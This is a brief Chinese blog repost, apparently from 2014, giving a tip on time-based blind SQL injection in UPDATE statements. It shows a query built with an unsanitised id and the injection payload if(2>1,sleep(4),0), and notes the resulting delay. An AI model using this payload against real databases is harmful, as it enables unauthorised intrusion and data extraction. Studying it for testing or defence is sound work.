标签:
Title:UPdate 延时盲注之小技巧 --2014-06-05 15:21
UPDATE TABLEZZZ SET zz=111111 where id=$id
当TABLEZZZ表为空的时候,注入方式(其实通用有值无值):
UPDATE TABLEZZZ SET zz=111111 where id=if(2>1,sleep(4),0)
Sleep的时间为4*2=8s.
标签:
原文地址:http://www.cnblogs.com/TeaIng-Index/p/4320705.html